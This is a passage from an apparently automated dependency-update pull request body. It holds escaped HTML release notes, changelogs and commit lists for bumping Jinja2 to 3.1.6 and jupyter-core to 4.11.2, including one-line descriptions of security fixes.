scientific notation. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1921\"\u003e#1921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e call. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e objects. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2025\"\u003e#2025\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2061\"\u003e#2061\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were searched. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not contain the templates directory. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1705\"\u003e#1705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1880\"\u003e#1880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1870\"\u003e#1870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTests decorated with \u003ccode\u003e@pass_context\u003c/code\u003e can be used with the \u003ccode\u003e|select\u003c/code\u003e filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1624\"\u003e#1624\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e for multiple assignment (\u003ccode\u003ea, b = 1, 2\u003c/code\u003e) does not fail when the target is a namespace attribute. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1413\"\u003e#1413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e in all branches of \u003ccode\u003e{% if %}{% elif %}{% else %}\u003c/code\u003e blocks does not cause the variable to be considered initially undefined. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1253\"\u003e#1253\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.4\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.4 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.4/\"\u003ehttps://pypi.org/project/Jinja2/3.1.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\"\u003ehttps://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003exmlattr\u003c/code\u003e filter does not allow keys with \u003ccode\u003e/\u003c/code\u003e solidus, \u003ccode\u003e\u0026gt;\u003c/code\u003e greater-than sign, or \u003ccode\u003e=\u003c/code\u003e equals sign, in addition to disallowing spaces. Regardless of any validation done by Jinja, user input should never be used as keys to this filter, or must be separately validated first. GHSA-h75v-3vvj-5mfj\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 3.1.x feature branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\"\u003eGHSA-h5c8-rqwp-cp95\u003c/a\u003e. You are affected if you are using \u003ccode\u003exmlattr\u003c/code\u003e and passing user input as attribute keys.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/blob/main/CHANGES.rst\"\u003ejinja2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.1.6\u003c/h2\u003e\n\u003cp\u003eReleased 2025-03-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup,\nallowing the sandbox to apply its checks. :ghsa:\u003ccode\u003ecpwx-vrp4-4pq7\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.1.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-12-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as\nby passing a stored reference to a filter that calls its argument.\n:ghsa:\u003ccode\u003eq2x7-8rv6-6q7h\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid\nissues with names that contain f-string syntax.\n:issue:\u003ccode\u003e1792\u003c/code\u003e, :ghsa:\u003ccode\u003egmj6-6f8f-6699\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence\ntypes. :issue:\u003ccode\u003e2032\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e.\n:pr:\u003ccode\u003e1952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends.\n:pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment\nwhen calling block references. :issue:\u003ccode\u003e1701\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another\nasync-aware filter. :issue:\u003ccode\u003e1781\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation.\n:issue:\u003ccode\u003e1921\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e\ncall. :issue:\u003ccode\u003e2021\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e\nobjects. :issue:\u003ccode\u003e2025\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object.\n:issue:\u003ccode\u003e2027\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. :pr:\u003ccode\u003e2061\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were\nsearched. :issue:\u003ccode\u003e1661\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not\ncontain the templates directory. :issue:\u003ccode\u003e1705\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. :pr:\u003ccode\u003e1880\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. :pr:\u003ccode\u003e1870\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/15206881c006c79667fe5154fe80c01c65410679\"\u003e\u003ccode\u003e1520688\u003c/code\u003e\u003c/a\u003e release version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403\"\u003e\u003ccode\u003e90457bb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/065334d1ee5b7210e1a0a93c37238c86858f2af7\"\u003e\u003ccode\u003e065334d\u003c/code\u003e\u003c/a\u003e attr filter uses env.getattr\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/033c20015c7ca899ab52eb921bb0f08e6d3dd145\"\u003e\u003ccode\u003e033c200\u003c/code\u003e\u003c/a\u003e start version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/bc68d4efa99c5f77334f0e519628558059ae8c35\"\u003e\u003ccode\u003ebc68d4e\u003c/code\u003e\u003c/a\u003e use global contributing guide (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/247de5e0c5062a792eb378e50e13e692885ee486\"\u003e\u003ccode\u003e247de5e\u003c/code\u003e\u003c/a\u003e use global contributing guide\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/ab8218c7a1b66b62e0ad6b941bd514e3a64a358f\"\u003e\u003ccode\u003eab8218c\u003c/code\u003e\u003c/a\u003e use project advisory link instead of global\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/b4ffc8ff299dfd360064bea4cd2f862364601ad2\"\u003e\u003ccode\u003eb4ffc8f\u003c/code\u003e\u003c/a\u003e release version 3.1.5 (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2066\"\u003e#2066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/877f6e51be8e1765b06d911cfaa9033775f051d1\"\u003e\u003ccode\u003e877f6e5\u003c/code\u003e\u003c/a\u003e release version 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/8d588592653b052f957b720e1fc93196e06f207f\"\u003e\u003ccode\u003e8d58859\u003c/code\u003e\u003c/a\u003e remove test pypi\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/jinja/compare/2.11.2...3.1.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jupyter-core` from 4.6.3 to 4.11.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jupyter/jupyter_core/releases\"\u003ejupyter-core's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.11.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix inclusion of jupyter file and check in CI by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/276\"\u003ejupyter/jupyter_core#276\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jupyter/jupyter_core/compare/4.11.0...4.11.1\"\u003ehttps://github.com/jupyter/jupyter_core/compare/4.11.0...4.11.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.11.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUse hatch backend by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/265\"\u003ejupyter/jupyter_core#265\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eis_hidden: Use normalized paths by \u003ca href=\"https://github.com/martinRenou\"\u003e\u003ccode\u003e@​martinRenou\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/271\"\u003ejupyter/jupyter_core#271\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/martinRenou\"\u003e\u003ccode\u003e@​martinRenou\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/271\"\u003ejupyter/jupyter_core#271\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jupyter/jupyter_core/compare/4.10.0...4.11.0\"\u003ehttps://github.com/jupyter/jupyter_core/compare/4.10.0...4.11.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.10.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate changelog for 4.9.2 by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/252\"\u003ejupyter/jupyter_core#252\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eInclude all files from \u003ccode\u003ejupyter_core\u003c/code\u003e by \u003ca href=\"https://github.com/jonringer\"\u003e\u003ccode\u003e@​jonringer\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/253\"\u003ejupyter/jupyter_core#253\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd project URLs to setup.cfg by \u003ca href=\"https://github.com/tlinhart\"\u003e\u003ccode\u003e@​tlinhart\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/254\"\u003ejupyter/jupyter_core#254\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSet up pre-commit by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/255\"\u003ejupyter/jupyter_core#255\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/257\"\u003ejupyter/jupyter_core#257\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd flake8 and mypy settings by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/256\"\u003ejupyter/jupyter_core#256\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eClean up CI by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/258\"\u003ejupyter/jupyter_core#258\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate changelog for 4.10 Release by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/259\"\u003ejupyter/jupyter_core#259\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jonringer\"\u003e\u003ccode\u003e@​jonringer\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/253\"\u003ejupyter/jupyter_core#253\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tlinhart\"\u003e\u003ccode\u003e@​tlinhart\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/254\"\u003ejupyter/jupyter_core#254\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/257\"\u003ejupyter/jupyter_core#257\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jupyter/jupyter_core/compare/4.9.2...4.10.0\"\u003ehttps://github.com/jupyter/jupyter_core/compare/4.9.2...4.10.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.9.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eset proper sys.argv[0] for subcommand by \u003ca href=\"https://github.com/bnavigator\"\u003e\u003ccode\u003e@​bnavigator\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/248\"\u003ejupyter/jupyter_core#248\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd explicit encoding in open calls by \u003ca href=\"https://github.com/dlukes\"\u003e\u003ccode\u003e@​dlukes\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/249\"\u003ejupyter/jupyter_core#249\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ejupyter_config_dir - reorder home_dir initialization by \u003ca href=\"https://github.com/dharmaquark\"\u003e\u003ccode\u003e@​dharmaquark\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/251\"\u003ejupyter/jupyter_core#251\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bnavigator\"\u003e\u003ccode\u003e@​bnavigator\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/248\"\u003ejupyter/jupyter_core#248\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dlukes\"\u003e\u003ccode\u003e@​dlukes\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/249\"\u003ejupyter/jupyter_core#249\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dharmaquark\"\u003e\u003ccode\u003e@​dharmaquark\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/251\"\u003ejupyter/jupyter_core#251\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jupyter/jupyter_core/compare/4.9.1...4.9.2\"\u003ehttps://github.com/jupyter/jupyter_core/compare/4.9.1...4.9.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jupyter/jupyter_core/blob/main/CHANGELOG.md\"\u003ejupyter-core's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChanges in jupyter-core\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e5.8.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e5.8.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e5.7.2\u003c/h2\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/jupyter_core/compare/v5.7.1...1264a81fc834f18db2b41e136ec4ac9d1a4ad993\"\u003eFull Changelog\u003c/a\u003e)\u003c/p\u003e\n\u003ch3\u003eMaintenance and upkeep improvements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Release Scripts \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/396\"\u003e#396\u003c/a\u003e (\u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnforce pytest 7 \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/393\"\u003e#393\u003c/a\u003e (\u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore: update pre-commit hooks \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/392\"\u003e#392\u003c/a\u003e (\u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/jupyter_core/graphs/contributors?from=2024-01-08\u0026amp;to=2024-03-12\u0026amp;type=c\"\u003eGitHub contributors page for this release\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fjupyter_core+involves%3Ablink1073+updated%3A2024-01-08..2024-03-12\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fjupyter_core+involves%3Apre-commit-ci+updated%3A2024-01-08..2024-03-12\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e5.7.1\u003c/h2\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/jupyter_core/compare/v5.7.0...8e69e7f1b856099c057e9711d5a439b33ef859d3\"\u003eFull Changelog\u003c/a\u003e)\u003c/p\u003e\n\u003ch3\u003eBugs fixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDerive JupyterAsyncApp from JupyterApp \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/389\"\u003e#389\u003c/a\u003e (\u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/jupyter_core/graphs/contributors?from=2024-01-03\u0026amp;to=2024-01-08\u0026amp;type=c\"\u003eGitHub contributors page for this release\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fjupyter_core+involves%3Ablink1073+updated%3A2024-01-03..2024-01-08\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e5.7.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/a8eac8cb0403e148880f1ae9e71dbb5db6451efe\"\u003e\u003ccode\u003ea8eac8c\u003c/code\u003e\u003c/a\u003e Release 4.11.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/1118c8ce01800cb689d51f655f5ccef19516e283\"\u003e\u003ccode\u003e1118c8c\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-m678-f26j-3hrp\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/d3f61f336bfe5c6c63e1af0d8c9fb0dea59f8793\"\u003e\u003ccode\u003ed3f61f3\u003c/code\u003e\u003c/a\u003e Release 4.11.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/e7eeb9e9dcc3d139dcf22e8c683e709533e18444\"\u003e\u003ccode\u003ee7eeb9e\u003c/code\u003e\u003c/a\u003e Fix inclusion of jupyter file and check in CI (\u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/issues/276\"\u003e#276\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/035bf1119a87dbd4a4510063826754b8c8a68b21\"\u003e\u003ccode\u003e035bf11\u003c/code\u003e\u003c/a\u003e Release 4.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/45aa28ba8bd3085f456da6ca363324deb427c8f0\"\u003e\u003ccode\u003e45aa28b\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/issues/273\"\u003e#273\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/73401cc7c99c52822bc3f007652d67636297620d\"\u003e\u003ccode\u003e73401cc\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/issues/272\"\u003e#272\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/bc6b77133525e4a724eeee6e244e404161cf9e41\"\u003e\u003ccode\u003ebc6b771\u003c/code\u003e\u003c/a\u003e is_hidden: Use normalized paths (\u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/issues/271\"\u003e#271\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/be38e5256e5bd562f46597bcae81df084a9c4598\"\u003e\u003ccode\u003ebe38e52\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/issues/270\"\u003e#270\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/7b790d8b6bbaf7966061ff1d6efa53b450aa2958\"\u003e\u003ccode\u003e7b790d8\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/issues/269\"\u003e#269\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits 